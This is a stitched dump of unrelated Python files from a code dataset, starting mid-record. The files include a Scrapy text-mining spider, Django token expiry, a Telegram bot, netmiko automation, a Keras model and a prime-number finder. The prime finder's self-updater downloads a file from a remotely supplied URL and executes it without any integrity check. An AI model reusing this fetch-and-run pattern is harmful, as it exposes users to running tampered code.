PorterStemmer()\n\t\t \n\t\tcorpus = [] \n\n\t\tcategories = None\n\t\tcategories, error = __get_categories__(self.url,self.response, self.supportCategories)\n\n\n\t\t__show_topics__(categories)\n\t\tarray_categories = ___get_topics__(categories)\n\n\t\tprint(str(array_categories))\n\t\t__create_dirPath__(array_categories)\n\n\n\t\tarray_Travel = [\n\t\t'https://edition.cnn.com/entertainment/culture/',\n\t\t'https://edition.cnn.com/entertainment/movies/',\n\t\t'https://edition.cnn.com/entertainment/celebrities/',\n\t\t'https://edition.cnn.com/entertainment/tv-shows/']\n\n\t\ttemp = []\n\t\ttemp_de = []\n\t\tfor href, title in array_categories:\n\t\t\ttemp.append(title)\n\t\t\ttemp_de.append(href)\n\n\t\tprint(str(temp[0]))\n\t\tprint(str(temp_de[0]))\n\n\n\t\tresult = []\n\t\tresult = __show_elements_topics__(str(temp_de[0]))\n\t\t#__show_hylt__(result)\n\n\n\t\tresult_de = []\n\t\tresult_de = __hylt__(result, str(temp_de[0]))\n\t\trere = []\n\t\trere = unique(result_de)\n\t\t#for data in result_de:\n\t\t\t#print(str(data))\n\n\t\tresult_de_de = []\n\t\tresult_de_de = __url_hylt__(array_Travel, str(urlparse(temp_de[0]).netloc))\n\t\t#result_de_de = __url_hylt__(array_Travel, str(temp_de[0]))\n\n\n\t\t\n\n\n\t\tdirPath_html_Travel = \"{}/{}/{}_html\".format(self.parsedUrl.hostname,temp[0], temp[0])\n\n\n\n\n\n\n\n\n\t\tfor i in range(len(result_de_de)):\n\n\t\t\tyield scrapy.Request(url=result_de_de[i],meta={'folder_pat':dirPath_html_Travel}, callback=self.parse)\n\n\n\n\n\n\n#=============================Make Directoy==================================================#\n\t\t\n\n\n\n\t\tarray_name_file = []\n\t\tarray_file = []\n\t\tdirPath_html = \"{}/{}/{}_html\".format(self.parsedUrl.hostname,str(temp[0]), str(temp[0]))\t\n\t\tfor root, dirs, files in os.walk(dirPath_html):\n\t\t\tfor file in files:\n\t\t\t\tif file.endswith(\".txt\"):\n\t\t\t\t\t#print(os.path.join(file).split(\".txt\"))\n\t\t\t\t\t#print(os.path.join(root, 
file)\n\t\t\t\t\tarray_sample = []\n\t\t\t\t\tarray_sample = os.path.join(file).split(\".txt\")\n\t\t\t\t\t\t\n\t\t\t\t\tarray_file.append(os.path.join(file))\n\n\t\t\t\t\tarray_name_file.append(array_sample[0])\n\n\n\t\tfor data in array_name_file:\n\t\t\tprint(str(data))\n\n\n\n\t\t#dirPath_html = \"{}/{}/{}_html\".format(self.parsedUrl.hostname, title, title)\t\n\t\tdirPath_word = \"{}/{}/{}_word\".format(self.parsedUrl.hostname,str(temp[0]), str(temp[0]))\n\t\tdirPath_BoW = \"{}/{}/{}_BoW\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]))\n\t\tdirPath_Tf_Idf = \"{}/{}/{}_Tf_Idf\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]))\n\t\tdirPath_Cosine = \"{}/{}/{}_Cosine\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]))\n\n\n\t\tdirPath_Cosine_BoW = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]),\"BoW\")\n\t\tdirPath_Cosine_Tf_Idf = \"{}/{}/{}_Cosine/{}\".format(self.parsedUrl.hostname, str(temp[0]), str(temp[0]),\"Tf_Idf\")\n\n\t\tluachon = 1\n\n\t\tif(luachon == 1):\n\t\t\tfor data in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_html, data))\n\t\t\t\ttext_cleaned = __clean_html__(text)\n\n\t\t\t\t#print(str(text_cleaned))\n\t\t\t\tsents = sent_tokenize(text_cleaned)\n\n\t\t\t\t#print(str(sents))\n\n\t\t\t\tsents_cleaned = [__remove_special_character(s) for s in sents]\n\t\t\t\ttext_sents_join = ' '.join(sents_cleaned)\n\t\t\t\twords = word_tokenize(text_sents_join)\n\t\t\t\twords = [word.lower() for word in words]\n\t\t\t\twords = [word for word in words if word not in self.my_stopwords]\n\t\t\t\tps = PorterStemmer()\n\t\t\t\twords = [ps.stem(word) for word in words]\n\t\t\t\tstringwords = ' '.join(words)\n\n\t\t\t\tsample = ''\n\t\t\t\tfor i in words:\n\t\t\t\t\tsample += i \n\t\t\t\t\tsample += \" \"\n\t\t\t\t#print(str(stringwords))\n\t\t\t\twriteText(\"{}/{}\".format(dirPath_word, data), stringwords)\n\n\n\n\t\t\n\t\t\tfor data1 in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data1))\n\t\t\t\tcorpus_final =[]\n\t\t\t\tcorpus_final.append(text)\n\t\t\t\tresult = CountVectorizer()\n\t\t\t\tbow = result.fit_transform(corpus_final).todense()\n\n\t\t\t\tbow1 = result.vocabulary_\n\n\t\t\t\twriteCountVectorizer(bow, bow1, data1, dirPath_BoW)\n\n\n\t\t\n\t\t\tfor data2 in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data2))\n\t\t\t\tcorpus_final =[]\n\t\t\t\tcorpus_final.append(text)\t\n\n\t\t\t\ttf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='english')\n\t\t\t\ttf_idf_matrix = tf.fit_transform(corpus_final)\n\t\t\t\tfeature_names = tf.get_feature_names()\n\t\t\t\tdense = tf_idf_matrix.todense()\n\n\t\t\t\twriteTfidfVectorizer(tf_idf_matrix, feature_names, dense, data2, dirPath_Tf_Idf )\n\n\n\n\t\t\n\t\t\tfor data3 in array_file:\n\t\t\t\t\n\t\t\t\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data3))\n\t\t\t\tcorpus_final =[]\n\t\t\t\tcorpus_final.append(text)\n\n\t\t\t\tresult = CountVectorizer()\n\t\t\t\tbow = result.fit_transform(corpus_final).todense()\n\n\t\t\t\tbow1 = result.vocabulary_\n\n\n\t\t\t\ttf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='english')\n\t\t\t\ttf_idf_matrix = tf.fit_transform(corpus_final)\n\t\t\t\tfeature_names = tf.get_feature_names()\n\t\t\t\tdense = tf_idf_matrix.todense()\n\n\n\t\t\t\tcorpus_final_BoW = []\n\t\t\t\tcorpus_final_Tf = []\n\t\t\t\tcorpus_final_BoW = CosiSim(bow)\n\t\t\t\tcorpus_final_Tf = 
CosiSim(dense)\n\n\t\t\t\toutout(corpus_final_BoW, data3, dirPath_Cosine_BoW)\n\t\t\t\toutout(corpus_final_Tf, data3, dirPath_Cosine_Tf_Idf)\n\t\t\t\t\n\n\n\n\t\telif(luachon == 2):\n\t\t\tfor data4 in array_file:\n\t\t\t\ttext = __get_text__(\"{}/{}\".format(dirPath_word, data4))\n\t\t\t\tcorpus_final = []\n\t\t\t\tcorpus_final.append(text)\n\n\t\t\t\tiris = datasets.load_iris()\n\t\t\t\tx = iris.data\n\t\t\t\ty = iris.target\n\t\t\t\tclass_names = iris.target_names\n\n\t\t\t\tx_train, x_test, y_train, y_test = train_test_split(x, y, random_state = 0, test_size = 0.3)\n\t\t\t\tknn = KNeighborsClassifier(n_neighbors = 10)\n\t\t\t\tknn.fit(x_train, y_train)\n\n\t\t\t\taccuracy = knn.score(x_test, y_test)\n\t\t\t\ty_pred = knn.predict(x_test)\n\t\t\t\tcm = confusion_matrix(y_test, y_pred)\n\t\t\t\tprecision_score(y_test, y_pred, average=None)\n\t\t\t\trecall_score(y_test, y_pred, average=None)\n\t\t\t\tf1_score(y_test, y_pred, average=None)\n\t\t\t\tclassifier = svm.SVC(kernel='linear', C=0.01).fit(x_train, y_train)\n\n\t\t\t\tnp.set_printoptions(precision=2)\n\t\t\t\ttitles_options = [(\"Confusion matrix, without normalization\", None), ]\n\t\t\t\tfor title, normalize in titles_options:\n\t\t\t\t\tdisp = plot_confusion_matrix(classifier, x_test, y_test)\n\n","sub_path":"vy/vy/spiders/threads_spider.py","file_name":"threads_spider.py","file_ext":"py","file_size_in_byte":21359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"605513188","text":"from datetime import timedelta\r\nfrom django.conf import settings\r\nfrom django.utils import timezone\r\nfrom rest_framework.authentication import TokenAuthentication\r\nfrom rest_framework import exceptions\r\n\r\n\"\"\"\r\nCurrently using hours for testing. 
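The pipeline in the spider record above refits a fresh CountVectorizer/TfidfVectorizer on a `corpus_final` that holds a single file at a time, so every cosine-similarity matrix it writes only compares a document with itself. A minimal sketch (assuming the cleaned, stemmed page texts are collected into one list first) that fits TF-IDF once over the whole corpus, so the similarities are between documents:

```python
# Sketch: one vectorizer over the whole corpus, not one per file.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

def corpus_similarity(texts):
    # texts: list of cleaned document strings, one per crawled page
    tf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), stop_words='english')
    tf_idf_matrix = tf.fit_transform(texts)   # shape (n_docs, n_terms)
    return cosine_similarity(tf_idf_matrix)   # shape (n_docs, n_docs)
```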
You may want to change \r\nto minutes when pushing to production\r\n\"\"\"\r\nEXPIRE_HOURS = getattr(settings, 'REST_FRAMEWORK_TOKEN_EXPIRE_HOURS', 2)\r\n# EXPIRE_MINUTES = getattr(settings, 'REST_FRAMEWORK_TOKEN_EXPIRE_MINUTES', 15)\r\n\r\n\"\"\"\r\nChecks whether the user's token has expired\r\n\"\"\"\r\nclass ExpiringTokenAuthentication(TokenAuthentication):\r\n    def authenticate_credentials(self, key):\r\n        try:\r\n            model = self.get_model()\r\n            token = model.objects.get(key=key)\r\n        except model.DoesNotExist:\r\n            raise exceptions.AuthenticationFailed('Invalid token')\r\n\r\n        if not token.user.is_active:\r\n            raise exceptions.AuthenticationFailed('User is inactive or deleted')\r\n\r\n        if token.created < timezone.now() - timedelta(hours=EXPIRE_HOURS):\r\n        # if token.created < timezone.now() - timedelta(minutes=EXPIRE_MINUTES):\r\n            raise exceptions.AuthenticationFailed('Token has expired')\r\n\r\n        return (token.user, token)","sub_path":"src/accounts/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"419919305","text":"import os\nimport requests\nimport telegram\nimport time\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nPRACTICUM_URL = 'https://praktikum.yandex.ru/api/user_api/homework_statuses/'\nPRACTICUM_TOKEN = os.getenv(\"PRACTICUM_TOKEN\")\nTELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')\nCHAT_ID = os.getenv('TELEGRAM_CHAT_ID')\nPROXY_ADDRES = os.getenv('PROXY')\n\n\ndef parse_homework_status(homework):\n    homework_name = homework.get('homework_name')\n    if homework.get('status') == 'rejected':\n        verdict = 'Unfortunately, errors were found in the work.'\n    else:\n        verdict = 'The reviewer liked everything, you can move on to the next lesson.'\n    return f'Your work \"{homework_name}\" has been reviewed!\\n\\n{verdict}'\n\n\ndef get_homework_statuses(current_timestamp):\n    headers = {'Authorization': f'OAuth {PRACTICUM_TOKEN}'}\n    params = {'from_date':current_timestamp}\n    url = PRACTICUM_URL\n    homework_statuses = requests.get(url = url, headers = headers, params = params).json()\n    return homework_statuses\n\n\ndef send_message(message):\n    #proxy = telegram.utils.request.Request(proxy_url = PROXY_ADDRES)\n    bot = telegram.Bot(token = TELEGRAM_TOKEN)#, request = proxy)\n    return bot.send_message(chat_id = CHAT_ID, text = message)\n\n\ndef main():\n    current_timestamp = int(time.time())  # initial timestamp value - the current unix time\n    while True:\n        try:\n            new_homework = get_homework_statuses(current_timestamp)\n            if new_homework.get('homeworks'):\n                send_message(parse_homework_status(new_homework.get('homeworks')[0]))\n            current_timestamp = new_homework.get('current_date')  # update the timestamp\n            time.sleep(1200)  # poll once every 20 minutes\n        except Exception as e:\n            print(f'Bot crashed with error: {e}')\n            time.sleep(5)\n            continue\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"199948298","text":"import logging\nimport sys\nfrom dataclasses import asdict, fields\n\nimport tornado.autoreload\nfrom http_client.options import parse_config_file as http_client_parse_config_file, options as http_client_options\n\nfrom frontik.loggers import bootstrap_core_logging, MDC\nfrom frontik.options import options, parse_config_file\n\nlog = logging.getLogger('config_parser')\n\n\ndef 
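The ExpiringTokenAuthentication class above rejects stale tokens, but nothing in the record re-issues them. A hedged sketch of a companion login view that swaps out an expired token; the view name is illustrative, while ObtainAuthToken and Token are the real DRF APIs and EXPIRE_HOURS is the constant defined in the module above:

```python
# Sketch: re-issue the token when the stored one is older than EXPIRE_HOURS.
from datetime import timedelta
from django.utils import timezone
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.response import Response

class ObtainExpiringAuthToken(ObtainAuthToken):
    def post(self, request, *args, **kwargs):
        serializer = self.serializer_class(data=request.data,
                                           context={'request': request})
        serializer.is_valid(raise_exception=True)
        user = serializer.validated_data['user']
        token, created = Token.objects.get_or_create(user=user)
        if not created and token.created < timezone.now() - timedelta(hours=EXPIRE_HOURS):
            token.delete()                      # stale token: issue a fresh one
            token = Token.objects.create(user=user)
        return Response({'token': token.key})
```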
parse_configs(config_files):\n    \"\"\"Reads command line options / config file and bootstraps logging.\n    \"\"\"\n    allowed_options = {**asdict(options), **asdict(http_client_options)}.keys()\n    parse_command_line(options, allowed_options)\n\n    if options.config:\n        configs_to_read = options.config\n    else:\n        configs_to_read = config_files\n\n    configs_to_read = list(filter(\n        None, [configs_to_read] if not isinstance(configs_to_read, (list, tuple)) else configs_to_read\n    ))\n\n    for config in configs_to_read:\n        http_client_parse_config_file(config)\n        parse_config_file(config)\n\n    # override options from config with command line options\n    parse_command_line(options, allowed_options)\n    parse_command_line(http_client_options, allowed_options)\n    MDC.init('master')\n    bootstrap_core_logging(options.log_level, options.log_json, options.suppressed_loggers)\n    for config in configs_to_read:\n        log.debug('using config: %s', config)\n        if options.autoreload:\n            tornado.autoreload.watch(config)\n\n\ndef parse_command_line(options, allowed_options):\n    args = sys.argv\n\n    for i in range(1, len(args)):\n        if not args[i].startswith(\"-\"):\n            break\n        if args[i] == \"--\":\n            break\n        arg = args[i].lstrip(\"-\")\n        name, equals, value = arg.partition(\"=\")\n        if name not in allowed_options:\n            log.error(f'Unrecognized command line option: {name}, skipped')\n            continue\n\n        option = next(filter(lambda x: x.name == name, fields(options)), None)\n        if option is None:\n            continue\n\n        if not equals:\n            if option.type == bool:\n                setattr(options, name, True)\n                continue\n            else:\n                raise Exception('Option %r requires a value' % name)\n\n        if option.type == bool:\n            setattr(options, name, value.lower() not in (\"false\", \"0\", \"f\"))\n        elif option.type == int:\n            setattr(options, name, int(value))\n        elif option.type == float:\n            setattr(options, name, float(value))\n        elif option.type == str:\n            setattr(options, name, value)\n        else:\n            raise Exception('Complex types are not implemented %r: %r' % (name, value))\n","sub_path":"frontik/config_parser.py","file_name":"config_parser.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"472059433","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTask 19.2\n\nCreate a function send_show_command_to_devices that sends\nthe same show command to different devices in parallel threads\nand then writes the command output to a file. The output from the devices may appear in the file in any order.\n\nFunction parameters:\n* devices - list of dictionaries with device connection parameters\n* command - the command to send\n* filename - name of the text file to which the output of all commands will be written\n* limit - maximum number of parallel threads (default 3)\n\nThe function returns nothing.\n\nThe command output must be written to a plain text file in this format (the hostname and the command itself must be written before the command output):\n\nR1#sh ip int br\nInterface                  IP-Address      OK? Method Status                Protocol\nEthernet0/0                192.168.100.1   YES NVRAM  up                    up\nEthernet0/1                192.168.200.1   YES NVRAM  up                    up\nR2#sh ip int br\nInterface                  IP-Address      OK? Method Status                Protocol\nEthernet0/0                192.168.100.2   YES NVRAM  up                    up\nEthernet0/1                10.1.1.1        YES NVRAM  administratively down down\nR3#sh ip int br\nInterface                  IP-Address      OK? Method Status                Protocol\nEthernet0/0                192.168.100.3   YES NVRAM  up                    up\nEthernet0/1                unassigned      YES NVRAM  administratively down down\n\nAny additional functions may be created to complete the task.\n\nTest the function on the devices from the devices.yaml file\n\"\"\"\n\n#!/usr/bin/env python3\n\nfrom datetime import datetime\nimport time\nfrom itertools import repeat\nfrom concurrent.futures import ThreadPoolExecutor\nimport logging\n\nimport netmiko\nimport yaml\n\nlogging.getLogger('paramiko').setLevel(logging.WARNING)\n\nlogging.basicConfig(\n    format = '%(threadName)s %(name)s %(levelname)s: %(message)s',\n    level=logging.INFO)\n\ndef send_show_command_to_devices(device, command):\n    start_msg = '===> {} Connection: {}'\n    received_msg = '<=== {} Received: {}'\n    ip = device['host']\n    logging.info(start_msg.format(datetime.now().time(), ip))\n\n    with netmiko.ConnectHandler(**device) as ssh:\n        ssh.enable()\n        result = ssh.send_command(strip_command=False, command_string=command)\n        logging.info(received_msg.format(datetime.now().time(), ip))\n    return result\n\nwith open('devices2.yaml') as f:\n    devices = yaml.safe_load(f)\n\nwith ThreadPoolExecutor(max_workers=3) as executor:\n    result = executor.map(send_show_command_to_devices, devices, repeat('sh ip int br'))\n    with open('show.txt', 'a') as dst:\n        for device, output in zip(devices, result):\n            print(output)\n            dst.write('\\n'+device['host']+'#')\n            dst.write(output)\n\n'''\nios-xe-mgmt-latest.cisco.com#sh ip int br\nInterface              IP-Address      OK? Method Status                Protocol\nGigabitEthernet1       10.10.20.48     YES NVRAM  up                    up \nGigabitEthernet2       10.255.255.2    YES other  administratively down down \nGigabitEthernet3       unassigned      YES NVRAM  administratively down down \nLoopback2              unassigned      YES unset  up                    up \nLoopback100            1.1.1.1         YES manual up                    up \nLoopback109            172.16.100.1    YES other  up                    up \nVirtualPortGroup0      172.16.0.1      YES manual up                    up \nVirtualPortGroup2      192.168.35.1    YES manual up                    up \n'''","sub_path":"19_concurrent_connections/task_19_2.py","file_name":"task_19_2.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"474502277","text":"import csv\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\nimport pickle\n\n## Parameters\nprint('set parameters...')\nside_cam_correction = 0.2\ntop_crop = 60\nbottom_crop = 20\nvalidation_split = 0.2\nbatch_size = 32\nnb_epoch = 5\n\n## Load data\n\n# read csv files\nprint('read csv files...')\ndata_folders = ['data/']\n\ndata = []\nfor folder in data_folders:\n    with open(folder + 'driving_log.csv') as csvfile:\n        reader = csv.reader(csvfile)\n        next(reader)\n        for line in reader:\n            # use all 3 cameras\n            data.append([folder + line[0].strip(), float(line[3]), 'normal'])\n            data.append([folder + line[1].strip(), float(line[3]) + side_cam_correction, 'normal'])\n            data.append([folder + line[2].strip(), float(line[3]) - side_cam_correction, 'normal'])\n            # use flipped image\n            data.append([folder + line[0].strip(), -(float(line[3])), 'flip'])\n            data.append([folder + line[1].strip(), -(float(line[3]) + side_cam_correction), 'flip'])\n            data.append([folder + line[2].strip(), -(float(line[3]) - side_cam_correction), 'flip'])\n\n# read the image files\nprint('read image files...')\nX_train = np.zeros((len(data), 160, 320,3))\ny_train = np.zeros((len(data)))\n\nfor index, item in enumerate(tqdm(data)):\n    image = cv2.cvtColor(cv2.imread(item[0]), cv2.COLOR_BGR2RGB)\n    if (item[2] == 'flip'):\n        image = np.fliplr(image)\n    X_train[index] = image\n    y_train[index] = 
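The netmiko script above hardwires the executor, device list, and output file at module level instead of providing the `send_show_command_to_devices(devices, command, filename, limit=3)` signature the task statement asks for. A sketch of that function, with the per-device worker renamed to `send_show_command` to free up the required name:

```python
# Sketch of the required signature, reusing the same netmiko logic as above.
from concurrent.futures import ThreadPoolExecutor
from itertools import repeat
import netmiko

def send_show_command(device, command):
    with netmiko.ConnectHandler(**device) as ssh:
        ssh.enable()
        return ssh.send_command(command_string=command, strip_command=False)

def send_show_command_to_devices(devices, command, filename, limit=3):
    # 'limit' caps the number of parallel threads, per the task statement
    with ThreadPoolExecutor(max_workers=limit) as executor:
        results = executor.map(send_show_command, devices, repeat(command))
        with open(filename, 'w') as dst:
            for device, output in zip(devices, results):
                dst.write('\n' + device['host'] + '#' + output)
```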
float(item[1])\n\n## Create the model\nfrom keras.models import Sequential\nfrom keras.layers import Cropping2D, Lambda, Flatten, Dense, Convolution2D, MaxPooling2D\n\nprint('creating model...')\n# use the simpler sequential model\nmodel = Sequential()\n# crop the input image\nmodel.add(Cropping2D(cropping=((top_crop, bottom_crop), (0,0)), input_shape=(160, 320, 3)))\n# normalize the image so it ranges from -1 to 1\nmodel.add(Lambda(lambda x: ((x / 255.0) - 0.5) * 2))\n# create the layers\nmodel.add(Convolution2D(32, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(32, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(32, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(64, 5, 5, activation='relu', border_mode='same'))\nmodel.add(MaxPooling2D())\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(Convolution2D(128, 5, 5, activation='relu', border_mode='same'))\nmodel.add(MaxPooling2D())\nmodel.add(Convolution2D(256, 5, 5, activation='relu', border_mode='same'))\nmodel.add(MaxPooling2D())\nmodel.add(Flatten())\nprint(model.layers[-1].output_shape)\n#model.add(Dense(2048))\nmodel.add(Dense(1024))\nmodel.add(Dense(1))\n# use adam for optimizer and mean-squared-error for loss\nmodel.compile(optimizer='adam', loss='mse')\n# train the model\nprint('training...')\nmodel.fit(X_train, y_train, validation_split=validation_split, batch_size=batch_size, nb_epoch=nb_epoch, shuffle=True)\n# save the model\nprint('saving model...')\nmodel.save('model.h5')\n","sub_path":"normal_model.py","file_name":"normal_model.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"11105697","text":"# Primer\n# github.com/smcclennon/Primer\nver = '1.1.0'\nproj = 'Primer'\n\n\nimport os, time\nfrom distutils.version import LooseVersion as semver\n\n\nif os.name == 'nt':\n Windows = True\nelse:\n Windows = False\n\n\n\nif Windows:\n import ctypes, urllib.request, json\n ctypes.windll.kernel32.SetConsoleTitleW(f' == {proj} v{ver} == Checking for updates...')\n\n updateAttempt = 0\n print('Checking for updates...', end='\\r')\n try: # Remove previous version if just updated\n with open(f'{proj}.tmp', 'r') as content_file:\n oldFile = str(content_file.read())\n # If the old version has the current filename, don't delete\n if oldFile != os.path.basename(__file__):\n os.remove(oldFile)\n os.remove(f'{proj}.tmp')\n except:\n pass\n while updateAttempt < 3:\n updateAttempt = updateAttempt+1\n try:\n with urllib.request.urlopen(\"https://smcclennon.github.io/update/api/3\") as url:\n repo = []\n for line in url.readlines():\n repo.append(line.decode().strip())\n apiLatest = repo[0] # Latest release details\n proj = repo[1] # Project name\n ddl = repo[2] # Direct download\n apiReleases = repo[3] # List of patch notes\n with urllib.request.urlopen(apiLatest) as url:\n data = json.loads(url.read().decode())\n latest = data['tag_name'][1:]\n del data # Prevent overlapping variable data\n release = json.loads(urllib.request.urlopen(\n apiReleases).read().decode())\n 
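`X_train` above materialises every frame of the sixfold-augmented dataset in memory at once. A sketch of a generator-based alternative in the same Keras 1.x style the script uses (`nb_epoch`, `fit_generator`); the entry layout mirrors the `data` list built above:

```python
# Sketch: stream shuffled batches instead of building one giant array.
import cv2
import numpy as np

def batch_generator(data, batch_size=32):
    while True:                            # Keras 1.x generators loop forever
        np.random.shuffle(data)
        for start in range(0, len(data), batch_size):
            images, angles = [], []
            for path, angle, mode in data[start:start + batch_size]:
                img = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
                if mode == 'flip':
                    img = np.fliplr(img)
                images.append(img)
                angles.append(angle)
            yield np.array(images), np.array(angles)

# model.fit_generator(batch_generator(data), samples_per_epoch=len(data), nb_epoch=nb_epoch)
```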
releases = [\n (data['tag_name'], data['body'])\n for data in release\n if semver(data['tag_name'][1:]) > semver(ver)]\n updateAttempt = 3\n except:\n latest = '0'\n if semver(latest) > semver(ver):\n print('Update available! ')\n print(f'Latest Version: v{latest}\\n')\n for release in releases:\n print(f'{release[0]}:\\n{release[1]}\\n')\n confirm = input(str('Update now? [Y/n] ')).upper()\n if confirm != 'N':\n latestFilename = f'{proj} v{latest}.py'\n # Download latest version to cwd\n print(f'Downloading \"{latestFilename}\"...')\n urllib.request.urlretrieve(ddl, latestFilename)\n # Write the current filename to LTFO.tmp\n f = open(f'{proj}.tmp', 'w')\n f.write(str(os.path.basename(__file__)))\n f.close()\n os.system(f'\"{latestFilename}\"') # Open latest version\n exit()\n\n\n\n\n\ntotal=0\nnum=2\ninvalid=0\nfound=0\ncalculations=0\ntaskDuration='0'\nattempts='...'\nconfig=[]\n\n\n\n\n\ntry:\n with open(f\"{proj}.config\", \"r\") as f:\n config=f.readlines()\n total=int(config[0])\n found=int(config[1])-1\n num=int(config[2])+1\nexcept:\n with open(f\"{proj}.config\", \"w\") as f:\n f.write('0\\n1')\n with open(f\"{proj}.config\", \"r\") as f:\n config=f.readlines()\n print(f'Created {proj}.config')\n total=int(config[0])\n found=int(config[1])-1\n\n\ndef updateFile(f):\n try:\n if f == 'all':\n with open(f\"{proj}.txt\", \"a\") as f:\n f.write('\\n'+str(num))\n with open(f\"{proj}.config\", \"w\") as f:\n f.write(f'{total}\\n{found}\\n{num}')\n elif f == 'txt':\n with open(f\"{proj}.txt\", \"a\") as f:\n f.write('\\n'+str(num))\n elif f == 'config':\n with open(f\"{proj}.config\", \"w\") as f:\n f.write(f'{total}\\n{found}\\n{num}')\n except Exception as e:\n print(f'\\n{e}\\nThis was likely caused by prime numbers being generated too quickly.')\n time.sleep(0.1)\n if str(e)[-2] == 't': #.tx(t)\n updateFile('txt')\n print('\\n- Storage file updated')\n elif str(e)[-2] == 'g': #.confi(g)\n updateFile('config')\n print('\\n- Config file updated')\n else:\n input('updateFile() Unknown fatal error')\n exit()\n print('File system is now up to date!\\n')\n\nif Windows: os.system('cls')\nnR = 'true' # New Round, track when a prime has just been found in the loop\nwhile True:\n if nR == 'true':\n taskStart = time.time()\n nR = 'false'\n\n while invalid == 0:\n if int(str(num)[-1]) % 2 == 0: # If number is even (ends in 0, 2, 4, 6, 8)\n total = total + 1\n calculations = calculations + 1\n invalid = 1 # Skip processing the number\n break\n\n for i in range(3,num):\n total = total + 1\n calculations = calculations + 1\n if num % i == 0: # If number is divisible by a number other than 1 or itself\n invalid = 1\n if Windows: taskDuration = round(time.time() - taskStart, 2) \n\n if invalid == 0:\n if not Windows: taskDuration = round(time.time() - taskStart, 2) \n nR = 'true'\n found = found + 1\n if Windows:\n print(f'Found Prime [#{found:,}]! --> {num:,} <-- {calculations:,} calculations in {taskDuration} seconds')\n else:\n print(f'{proj} v{ver} >> Found Prime [#{found:,}]! 
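The Primer inner loop trial-divides by every integer from 3 up to `num`, so each test costs O(n). Checking odd divisors only up to the square root gives the same verdict far more cheaply; a drop-in sketch (Python 3.8+ for math.isqrt):

```python
import math

def is_prime(n):
    # A composite n always has a divisor no larger than sqrt(n),
    # so stopping there is equivalent to dividing all the way up to n.
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    for d in range(3, math.isqrt(n) + 1, 2):
        if n % d == 0:
            return False
    return True
```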
--> {num:,} <-- [Total: {total:,}] {calculations:,} calculations in {taskDuration} seconds')\n        calculations = 0\n        updateFile('all')\n        break\n    \n    num = num + 1\n    invalid = 0\n    if Windows:\n        ctypes.windll.kernel32.SetConsoleTitleW(f' == {proj} v{ver} == Total Calculations: {total:,} --- Elapsed: {round(float(taskDuration), 1)}s --- Testing: {num:,}')\n        # https://stackoverflow.com/questions/5676646\n","sub_path":"Primer.py","file_name":"Primer.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"227561084","text":"\"\"\"\nIf a list contains n numbers, write an algorithm that returns the position of the largest value.\n\"\"\"\n\n\ndef max_pos(a):\n    n = len(a)\n    max_v = 0\n    for i in range(1, n):\n        if a[i] > a[max_v]:\n            max_v = i\n    return max_v\n\n\nv = [1, 2, 91, 67, 9]\nprint(max_pos(v))\n","sub_path":"2/2-2.py","file_name":"2-2.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
